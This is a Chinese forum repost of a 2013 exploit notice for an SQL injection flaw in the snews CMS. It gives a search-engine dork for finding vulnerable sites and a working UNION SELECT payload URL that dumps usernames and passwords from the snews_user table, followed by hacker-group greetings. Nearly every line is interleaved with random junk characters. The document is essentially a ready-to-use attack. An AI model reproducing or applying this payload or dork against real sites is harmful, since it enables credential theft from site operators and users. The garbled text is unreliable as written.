标题: CMS snews SQL Injection Vulnerability0 Q, q3 @" F7 n$ @
作者: By onestree
( M3 f+ L& ^) [0 S下载地址 : http://snewscms.com/
5 o: V# ]6 a1 B: ?- k+ m测试平台 : ubuntu 12.10 / win 7
- j' S% Y8 c$ X5 |关键词: inurl:"tanyakan pada rumput yang bergoyang"$ ~) ?5 T0 G* Y: j
# ~! r5 x- c: _' a: p/ x2 w* _- x * |; O. n( F% r: P; w# |
*************************************************************, ^# G5 H% U( J- ~
$ m/ C1 I& c' [# H
SQL poc:
& P. s! @) z: m
a8 W0 } l# m: ?7 g8 o5 }7 z& ehttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]1 ?& {* d. g9 l8 n9 Y
- P. r W7 c/ p9 q/ c1 o( Q2 r示例
, p6 F# I. j9 w1 n! T
8 u" C5 A8 h: H2 U ~http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*: L0 U. i+ C% I& l/ k6 ?9 h
8 n* O! `6 z9 x6 A& d S
, p( Z' ^) t v4 b2 ?
致谢:% O. h% J# T. n( A+ h/ @
2 {' X6 J& }. m& l) |3 l+ c4 ?
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
8 m$ L$ [: `) O6 Q
. ^* b2 ]$ D# b/ t+ I6 P2 V% ? indonesiancoder - moeslimh4x0r - go-coder$ K6 V1 G0 V: [3 r, M# L
( |, E" _1 O6 x, r2 G
spesial my hunny :*! r! K+ a* C+ H/ \" s
|
发表于 2013-1-23 08:55:06
收藏
支持
反对